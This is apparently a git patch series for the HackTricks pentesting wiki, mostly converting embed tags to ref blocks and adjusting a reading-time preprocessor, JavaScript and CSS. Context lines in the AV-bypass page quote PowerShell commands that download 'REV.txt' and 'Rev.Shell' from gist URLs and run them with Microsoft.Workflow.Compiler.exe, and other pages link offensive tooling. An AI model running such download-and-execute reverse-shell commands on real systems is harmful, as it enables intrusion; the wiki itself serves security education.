a/src/pentesting-web/xxe-xee-xml-external-entity.md b/src/pentesting-web/xxe-xee-xml-external-entity.md index 953454955..e5688c52f 100644 --- a/src/pentesting-web/xxe-xee-xml-external-entity.md +++ b/src/pentesting-web/xxe-xee-xml-external-entity.md @@ -2,7 +2,6 @@ {{#include ../banners/hacktricks-training.md}} - ## XML Basics XML is a markup language designed for data storage and transport, featuring a flexible structure that allows for the use of descriptively named tags. It differs from HTML by not being limited to a set of predefined tags. XML's significance has declined with the rise of JSON, despite its initial role in AJAX technology. @@ -228,7 +227,9 @@ For more information check [https://portswigger.net/web-security/xxe/blind](http In the following awesome github repo you can find **paths of DTDs that can be present in the system**: -{% embed url="https://github.com/GoSecure/dtd-finder/tree/master/list" %} +{{#ref}} +https://github.com/GoSecure/dtd-finder/tree/master/list +{{#endref}} Moreover, if you have the **Docker image of the victim system**, you can use the tool of the same repo to **scan** the **image** and **find** the path of **DTDs** present inside the system. Read the [Readme of the github](https://github.com/GoSecure/dtd-finder) to learn how. @@ -764,7 +765,9 @@ XMLDecoder is a Java class that creates objects based on a XML message. If a mal ## Tools -{% embed url="https://github.com/luisfontes19/xxexploiter" %} +{{#ref}} +https://github.com/luisfontes19/xxexploiter +{{#endref}} ## References @@ -777,8 +780,4 @@ XMLDecoder is a Java class that creates objects based on a XML message. If a mal - [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe)\\ - [https://gosecure.github.io/xxe-workshop/#7](https://gosecure.github.io/xxe-workshop/#7) - {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md index 25ca65ab0..8ac6193cd 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md @@ -17,7 +17,9 @@ Usually, all these structures are faked by making an **initial ROP chain that ca You can find a better explanation about this technique in the second half of the video: -{% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %} +{{#ref}} +https://youtu.be/ADULSwnQs-s?feature=shared +{{#endref}} ## Structures @@ -63,6 +65,3 @@ p.interactive() - [https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve) {{#include ../../../banners/hacktricks-training.md}} - - - diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md index 9de40c526..e68bf54bc 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md @@ -21,7 +21,9 @@ rop-syscall-execv.md For a better explanation check also: -{% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %} +{{#ref}} +https://youtu.be/ADULSwnQs-s?feature=shared +{{#endref}} ## Example @@ -60,6 +62,3 @@ p.interactive() - [https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop) {{#include ../../../banners/hacktricks-training.md}} - - - diff --git a/src/reversing/reversing-tools-basic-methods/README.md b/src/reversing/reversing-tools-basic-methods/README.md index fb7c07bb3..3030415e1 100644 --- a/src/reversing/reversing-tools-basic-methods/README.md +++ b/src/reversing/reversing-tools-basic-methods/README.md @@ -166,7 +166,9 @@ cheat-engine.md ## ARM & MIPS -{% embed url="https://github.com/nongiach/arm_now" %} +{{#ref}} +https://github.com/nongiach/arm_now +{{#endref}} ## Shellcodes @@ -402,7 +404,9 @@ So, in this challenge, knowing the values of the buttons, you needed to **press ## Game Boy -{% embed url="https://www.youtube.com/watch?v=VVbRe7wr3G4" %} +{{#ref}} +https://www.youtube.com/watch?v=VVbRe7wr3G4 +{{#endref}} ## Courses @@ -410,6 +414,3 @@ So, in this challenge, knowing the values of the buttons, you needed to **press - [https://github.com/malrev/ABD](https://github.com/malrev/ABD) (Binary deobfuscation) {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/stego/esoteric-languages.md b/src/stego/esoteric-languages.md index 9890075ce..e5f1ff05e 100644 --- a/src/stego/esoteric-languages.md +++ b/src/stego/esoteric-languages.md @@ -52,7 +52,9 @@ Take it to the top Whisper my world ``` -{% embed url="https://codewithrockstar.com/" %} +{{#ref}} +https://codewithrockstar.com/ +{{#endref}} ## PETOOH @@ -67,6 +69,3 @@ Kukarek ``` {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/todo/burp-suite.md b/src/todo/burp-suite.md index 927d53fa0..62d07e098 100644 --- a/src/todo/burp-suite.md +++ b/src/todo/burp-suite.md @@ -10,11 +10,10 @@ [https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Payload to execute commands and grab the output via DNS requests to burpcollab. -{% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %} +{{#ref}} +https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e +{{#endref}} [https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator) {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/todo/other-web-tricks.md b/src/todo/other-web-tricks.md index c2dfe55bc..17f71a89a 100644 --- a/src/todo/other-web-tricks.md +++ b/src/todo/other-web-tricks.md @@ -24,7 +24,9 @@ Register an email, before confirming it change the email, then, if the new confi ### Access Internal servicedesk of companies using atlassian -{% embed url="https://yourcompanyname.atlassian.net/servicedesk/customer/user/login" %} +{{#ref}} +https://yourcompanyname.atlassian.net/servicedesk/customer/user/login +{{#endref}} ### TRACE method @@ -33,6 +35,3 @@ Developers might forget to disable various debugging options in the production e ![Image for post](https://miro.medium.com/max/1330/1*wDFRADTOd9Tj63xucenvAA.png) {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/todo/references.md b/src/todo/references.md index 7b4e414f8..eb3792a1f 100644 --- a/src/todo/references.md +++ b/src/todo/references.md @@ -1,52 +1,95 @@ {{#include ../banners/hacktricks-training.md}} -{% embed url="https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#python-tty-shell-trick" %} +{{#ref}} +https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#python-tty-shell-trick +{{#endref}} -{% embed url="https://hausec.com/pentesting-cheatsheet/#_Toc475368982" %} +{{#ref}} +https://hausec.com/pentesting-cheatsheet/#_Toc475368982 +{{#endref}} -{% embed url="https://anhtai.me/pentesting-cheatsheet/" %} +{{#ref}} +https://anhtai.me/pentesting-cheatsheet/ +{{#endref}} -{% embed url="https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html" %} +{{#ref}} +https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html +{{#endref}} -{% embed url="https://ired.team/offensive-security-experiments/offensive-security-cheetsheets" %} +{{#ref}} +https://ired.team/offensive-security-experiments/offensive-security-cheetsheets +{{#endref}} -{% embed url="https://chryzsh.gitbooks.io/pentestbook/basics_of_windows.html" %} +{{#ref}} +https://chryzsh.gitbooks.io/pentestbook/basics_of_windows.html +{{#endref}} -{% embed url="https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md" %} +{{#ref}} +https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md +{{#endref}} -{% embed url="https://anhtai.me/oscp-fun-guide/" %} +{{#ref}} +https://anhtai.me/oscp-fun-guide/ +{{#endref}} -{% embed url="https://www.thehacker.recipes/" %} +{{#ref}} +https://www.thehacker.recipes/ +{{#endref}} -{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings" %} +{{#ref}} +https://github.com/swisskyrepo/PayloadsAllTheThings +{{#endref}} -{% embed url="https://gtfobins.github.io/" %} +{{#ref}} +https://gtfobins.github.io/ +{{#endref}} -{% embed url="https://github.com/RistBS/Awesome-RedTeam-Cheatsheet" %} +{{#ref}} +https://github.com/RistBS/Awesome-RedTeam-Cheatsheet +{{#endref}} -{% embed url="https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet" %} +{{#ref}} +https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet +{{#endref}} -{% embed url="https://hideandsec.sh/" %} +{{#ref}} +https://hideandsec.sh/ +{{#endref}} -{% embed url="https://cheatsheet.haax.fr/" %} +{{#ref}} +https://cheatsheet.haax.fr/ +{{#endref}} -{% embed url="https://infosecwriteups.com/" %} +{{#ref}} +https://infosecwriteups.com/ +{{#endref}} -{% embed url="https://www.exploit-db.com/" %} +{{#ref}} +https://www.exploit-db.com/ +{{#endref}} -{% embed url="https://wadcoms.github.io/" %} +{{#ref}} +https://wadcoms.github.io/ +{{#endref}} -{% embed url="https://lolbas-project.github.io" %} +{{#ref}} +https://lolbas-project.github.io +{{#endref}} -{% embed url="https://pentestbook.six2dez.com/" %} +{{#ref}} +https://pentestbook.six2dez.com/ +{{#endref}} -{% embed url="https://www.hackingarticles.in/" %} +{{#ref}} +https://www.hackingarticles.in/ +{{#endref}} -{% embed url="https://pentestlab.blog/" %} +{{#ref}} +https://pentestlab.blog/ +{{#endref}} -{% embed url="https://ippsec.rocks/" %} +{{#ref}} +https://ippsec.rocks/ +{{#endref}} {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/windows-hardening/active-directory-methodology/README.md b/src/windows-hardening/active-directory-methodology/README.md index 6411fe2fe..06d85c06c 100644 --- a/src/windows-hardening/active-directory-methodology/README.md +++ b/src/windows-hardening/active-directory-methodology/README.md @@ -684,7 +684,9 @@ rdp-sessions-abuse.md ## AD -> Azure & Azure -> AD -{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/azure-ad-connect-hybrid-identity" %} +{{#ref}} +https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/azure-ad-connect-hybrid-identity +{{#endref}} ## Some General Defenses @@ -721,6 +723,3 @@ rdp-sessions-abuse.md - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain) {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md b/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md index 5aadead6b..cc259f585 100644 --- a/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md +++ b/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md @@ -55,7 +55,9 @@ If an attacker has already compromised a computer with [Unconstrained Delegation ## RCP Force authentication -{% embed url="https://github.com/p0dalirius/Coercer" %} +{{#ref}} +https://github.com/p0dalirius/Coercer +{{#endref}} ## PrivExchange @@ -128,6 +130,3 @@ If you can capture [NTLMv1 challenges read here how to crack them](../ntlm/#ntlm &#xNAN;_Remember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"_ {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/windows-hardening/authentication-credentials-uac-and-efs.md b/src/windows-hardening/authentication-credentials-uac-and-efs.md index 6c0413bf2..242fe5e6b 100644 --- a/src/windows-hardening/authentication-credentials-uac-and-efs.md +++ b/src/windows-hardening/authentication-credentials-uac-and-efs.md @@ -140,7 +140,9 @@ This way requires the **victim user** to be **running** a **process** inside the #### Knowing the users password -{% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %} +{{#ref}} +https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files +{{#endref}} ## Group Managed Service Accounts (gMSA) @@ -264,8 +266,4 @@ The SSPI will be in charge of finding the adequate protocol for two machines tha windows-security-controls/uac-user-account-control.md {{#endref}} - {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/windows-hardening/authentication-credentials-uac-and-efs/README.md b/src/windows-hardening/authentication-credentials-uac-and-efs/README.md index 157a35998..52ae38167 100644 --- a/src/windows-hardening/authentication-credentials-uac-and-efs/README.md +++ b/src/windows-hardening/authentication-credentials-uac-and-efs/README.md @@ -140,7 +140,9 @@ This way requires the **victim user** to be **running** a **process** inside the #### Knowing the users password -{% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %} +{{#ref}} +https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files +{{#endref}} ## Group Managed Service Accounts (gMSA) @@ -265,6 +267,3 @@ uac-user-account-control.md {{#endref}} {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/windows-hardening/av-bypass.md b/src/windows-hardening/av-bypass.md index 5908cc513..3b7ea72fd 100644 --- a/src/windows-hardening/av-bypass.md +++ b/src/windows-hardening/av-bypass.md @@ -2,7 +2,6 @@ {{#include ../banners/hacktricks-training.md}} - **This page was written by** [**@m2rc_p**](https://twitter.com/m2rc_p)**!** ## **AV Evasion Methodology** @@ -313,11 +312,15 @@ Every environment you go against will have their own strengths and weaknesses. I highly encourage you go watch this talk from [@ATTL4S](https://twitter.com/DaniLJ94), to get a foothold into more Advanced Evasion techniques. -{% embed url="https://vimeo.com/502507556?embedded=true&owner=32913914&source=vimeo_logo" %} +{{#ref}} +https://vimeo.com/502507556?embedded=true&owner=32913914&source=vimeo_logo +{{#endref}} his is also another great talk from [@mariuszbit](https://twitter.com/mariuszbit) about Evasion in Depth. -{% embed url="https://www.youtube.com/watch?v=IbA7Ung39o4" %} +{{#ref}} +https://www.youtube.com/watch?v=IbA7Ung39o4 +{{#endref}} ## **Old Techniques** @@ -512,7 +515,9 @@ powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.g powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell ``` -{% embed url="https://gist.github.com/BankSecurity/469ac5f9944ed1b8c39129dc0037bb8f" %} +{{#ref}} +https://gist.github.com/BankSecurity/469ac5f9944ed1b8c39129dc0037bb8f +{{#endref}} C# obfuscators list: [https://github.com/NotPrab/.NET-Obfuscator](https://github.com/NotPrab/.NET-Obfuscator) @@ -566,8 +571,4 @@ https://github.com/praetorian-code/vulcan - [https://github.com/persianhydra/Xeexe-TopAntivirusEvasion](https://github.com/persianhydra/Xeexe-TopAntivirusEvasion) - {{#include ../banners/hacktricks-training.md}} - - - diff --git a/src/windows-hardening/windows-local-privilege-escalation/README.md b/src/windows-hardening/windows-local-privilege-escalation/README.md index 27d45f03f..74bc41445 100644 --- a/src/windows-hardening/windows-local-privilege-escalation/README.md +++ b/src/windows-hardening/windows-local-privilege-escalation/README.md @@ -1544,7 +1544,9 @@ If you manages to **hijack a dll** being **loaded** by a **process** running as ### **From Administrator or Network Service to System** -{% embed url="https://github.com/sailay1996/RpcSsImpersonator" %} +{{#ref}} +https://github.com/sailay1996/RpcSsImpersonator +{{#endref}} ### From LOCAL SERVICE or NETWORK SERVICE to full privs @@ -1618,6 +1620,3 @@ C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the - [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#antivirus--detections](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#antivirus--detections) {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md b/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md index 1cd154432..cf8ea738f 100644 --- a/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md +++ b/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md @@ -2,8 +2,7 @@ {{#include ../../banners/hacktricks-training.md}} -> [!WARNING] -> **JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. _**Check:**_ +> [!WARNING] > **JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. _**Check:**_ {{#ref}} roguepotato-and-printspoofer.md @@ -114,7 +113,9 @@ c:\Users\Public> Oftentimes, the default CLSID that JuicyPotato uses **doesn't work** and the exploit fails. Usually, it takes multiple attempts to find a **working CLSID**. To get a list of CLSIDs to try for a specific operating system, you should visit this page: -{% embed url="https://ohpe.it/juicy-potato/CLSID/" %} +{{#ref}} +https://ohpe.it/juicy-potato/CLSID/ +{{#endref}} ### **Checking CLSIDs** @@ -131,6 +132,3 @@ Then download [test_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master - [https://github.com/ohpe/juicy-potato/blob/master/README.md](https://github.com/ohpe/juicy-potato/blob/master/README.md) {{#include ../../banners/hacktricks-training.md}} - - - From fd207cb6b1d675d4e8d54f2629847e332ccace9a Mon Sep 17 00:00:00 2001 From: Congon4tor Date: Fri, 3 Jan 2025 02:51:33 +0100 Subject: [PATCH 2/5] Add reat time using preprocessor --- hacktricks-preprocessor.py | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/hacktricks-preprocessor.py b/hacktricks-preprocessor.py index fedfdef99..0a916cbfc 100644 --- a/hacktricks-preprocessor.py +++ b/hacktricks-preprocessor.py @@ -69,6 +69,12 @@ def ref(matchobj): return result +def add_read_time(content): + regex = r'(# .*(?=\n))' + new_content = re.sub(regex, lambda x: x.group(0) + "\n\nReading time: {{ #reading_time }}", content) + return new_content + + def iterate_chapters(sections): if isinstance(sections, dict) and "PartTitle" in sections: # Not a chapter section return @@ -99,6 +105,7 @@ if __name__ == '__main__': current_chapter = chapter regex = r'{{[\s]*#ref[\s]*}}(?:\n)?([^\\\n]*)(?:\n)?{{[\s]*#endref[\s]*}}' new_content = re.sub(regex, ref, chapter['content']) + new_content = add_read_time(new_content) chapter['content'] = new_content content = json.dumps(book) From 9fcbdf80948e6ede7104ef16dd0e15fc377bb23e Mon Sep 17 00:00:00 2001 From: Congon4tor Date: Fri, 3 Jan 2025 02:53:36 +0100 Subject: [PATCH 3/5] fix read time in readme --- src/README.md | 7 +------ 1 file changed, 1 insertion(+), 6 deletions(-) diff --git a/src/README.md b/src/README.md index fae21c7b3..6a9ff97b7 100644 --- a/src/README.md +++ b/src/README.md @@ -1,13 +1,10 @@ # HackTricks -Reading time: {{ #reading_time }} -
_Hacktricks logos & motion design by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ -> [!TIP] -> **Welcome to the wiki where you will find each hacking trick/technique/whatever I have learnt from CTFs, real life apps, reading researches, and news.** +> [!TIP] > **Welcome to the wiki where you will find each hacking trick/technique/whatever I have learnt from CTFs, real life apps, reading researches, and news.** To get started follow this page where you will find the **typical flow** that **you should follow when pentesting** one or more **machines:** @@ -154,5 +151,3 @@ welcome/hacktricks-values-and-faq.md ![HackTricks Github Stats](https://repobeats.axiom.co/api/embed/68f8746802bcf1c8462e889e6e9302d4384f164b.svg) {{#include ./banners/hacktricks-training.md}} - - From 47ba2ab451028a541657ba314e8066487bc28f3c Mon Sep 17 00:00:00 2001 From: Congon4tor Date: Fri, 3 Jan 2025 03:30:44 +0100 Subject: [PATCH 4/5] Fix page index with links --- theme/pagetoc.js | 96 ++++++++++++++++++++++++++---------------------- 1 file changed, 52 insertions(+), 44 deletions(-) diff --git a/theme/pagetoc.js b/theme/pagetoc.js index 5962db9f3..a51ea29ae 100644 --- a/theme/pagetoc.js +++ b/theme/pagetoc.js @@ -1,68 +1,76 @@ -let scrollTimeout; +let scrollTimeout const listenActive = () => { - const elems = document.querySelector(".pagetoc").children; - [...elems].forEach(el => { + const elems = document.querySelector(".pagetoc").children + ;[...elems].forEach((el) => { el.addEventListener("click", (event) => { - clearTimeout(scrollTimeout); - [...elems].forEach(el => el.classList.remove("active")); - el.classList.add("active"); + clearTimeout(scrollTimeout) + ;[...elems].forEach((el) => el.classList.remove("active")) + el.classList.add("active") // Prevent scroll updates for a short period scrollTimeout = setTimeout(() => { - scrollTimeout = null; - }, 100); // Adjust timing as needed - }); - }); -}; + scrollTimeout = null + }, 100) // Adjust timing as needed + }) + }) +} -const getPagetoc = () => document.querySelector(".pagetoc") || autoCreatePagetoc(); +const getPagetoc = () => + document.querySelector(".pagetoc") || autoCreatePagetoc() const autoCreatePagetoc = () => { - const main = document.querySelector("#content > main"); + const main = document.querySelector("#content > main") const content = Object.assign(document.createElement("div"), { - className: "content-wrap" - }); - content.append(...main.childNodes); - main.prepend(content); - main.insertAdjacentHTML("afterbegin", '
'); - return document.querySelector(".pagetoc"); -}; + className: "content-wrap", + }) + content.append(...main.childNodes) + main.prepend(content) + main.insertAdjacentHTML( + "afterbegin", + '
' + ) + return document.querySelector(".pagetoc") +} const updateFunction = () => { - if (scrollTimeout) return; // Skip updates if within the cooldown period from a click - const headers = [...document.getElementsByClassName("header")]; - const scrolledY = window.scrollY; - let lastHeader = null; + if (scrollTimeout) return // Skip updates if within the cooldown period from a click + const headers = [...document.getElementsByClassName("header")] + const scrolledY = window.scrollY + let lastHeader = null // Find the last header that is above the current scroll position for (let i = headers.length - 1; i >= 0; i--) { if (scrolledY >= headers[i].offsetTop) { - lastHeader = headers[i]; - break; + lastHeader = headers[i] + break } } - const pagetocLinks = [...document.querySelector(".pagetoc").children]; - pagetocLinks.forEach(link => link.classList.remove("active")); + const pagetocLinks = [...document.querySelector(".pagetoc").children] + pagetocLinks.forEach((link) => link.classList.remove("active")) if (lastHeader) { - const activeLink = pagetocLinks.find(link => lastHeader.href === link.href); - if (activeLink) activeLink.classList.add("active"); + const activeLink = pagetocLinks.find( + (link) => lastHeader.href === link.href + ) + if (activeLink) activeLink.classList.add("active") } -}; +} -window.addEventListener('load', () => { - const pagetoc = getPagetoc(); - const headers = [...document.getElementsByClassName("header")]; - headers.forEach(header => { +window.addEventListener("load", () => { + const pagetoc = getPagetoc() + const headers = [...document.getElementsByClassName("header")] + headers.forEach((header) => { const link = Object.assign(document.createElement("a"), { textContent: header.text, href: header.href, - className: `pagetoc-${header.parentElement.tagName}` - }); - pagetoc.appendChild(link); - }); - updateFunction(); - listenActive(); - window.addEventListener("scroll", updateFunction); -}); - + className: `pagetoc-${header.parentElement.tagName}`, + }) + if (header.parentElement.querySelectorAll("a").length === 2) { + link.textContent = header.parentElement.querySelectorAll("a")[1].text + } + pagetoc.appendChild(link) + }) + updateFunction() + listenActive() + window.addEventListener("scroll", updateFunction) +}) From d8cff20f33bc2164c875ec008dd57af7ea725c74 Mon Sep 17 00:00:00 2001 From: Congon4tor Date: Fri, 3 Jan 2025 14:16:27 +0100 Subject: [PATCH 5/5] Style tables --- hacktricks-preprocessor.py | 2 +- theme/css/chrome.css | 2 +- theme/css/variables.css | 6 +++--- theme/pagetoc.css | 2 +- 4 files changed, 6 insertions(+), 6 deletions(-) diff --git a/hacktricks-preprocessor.py b/hacktricks-preprocessor.py index 0a916cbfc..b3186537d 100644 --- a/hacktricks-preprocessor.py +++ b/hacktricks-preprocessor.py @@ -70,7 +70,7 @@ def ref(matchobj): def add_read_time(content): - regex = r'(# .*(?=\n))' + regex = r'(<\/style>\n# .*(?=\n))' new_content = re.sub(regex, lambda x: x.group(0) + "\n\nReading time: {{ #reading_time }}", content) return new_content diff --git a/theme/css/chrome.css b/theme/css/chrome.css index ead7ee881..33b17c61f 100644 --- a/theme/css/chrome.css +++ b/theme/css/chrome.css @@ -835,7 +835,7 @@ html:not(.sidebar-resizing) .sidebar { border-top: 1px solid var(--table-border-color); margin-top: 1rem; align-content: center; - z-index: 101; + z-index: 106; } .footer .theme-wrapper { max-width: var(--container-max-width); diff --git a/theme/css/variables.css b/theme/css/variables.css index fbe328e4d..5aa7b2f5b 100644 --- a/theme/css/variables.css +++ b/theme/css/variables.css @@ -343,8 +343,8 @@ --warning-border: #ff8e00; --table-border-color: #2f2f2f; - --table-header-bg: hsl(226, 23%, 31%); - --table-alternate-bg: hsl(226, 23%, 14%); + --table-header-bg: #2f2f2f; + --table-alternate-bg: #222222; --searchbar-border-color: #2f2f2f; --searchbar-bg: hsl(0, 0%, 11%); @@ -429,7 +429,7 @@ --warning-border: #ff8e00; --table-border-color: hsl(0, 0%, 95%); - --table-header-bg: hsl(0, 0%, 80%); + --table-header-bg: hsl(0, 0%, 95%); --table-alternate-bg: hsl(0, 0%, 97%); --searchbar-border-color: #aaa; diff --git a/theme/pagetoc.css b/theme/pagetoc.css index d979c7427..17293c36f 100644 --- a/theme/pagetoc.css +++ b/theme/pagetoc.css @@ -72,7 +72,7 @@ .sidetoc-wrapper { position: fixed; width: 250px; - height: calc(100vh - var(--menu-bar-height) - 25px * 2); + height: calc(100vh - var(--menu-bar-height) - 50px * 2); overflow: auto; display: flex; flex-direction: column;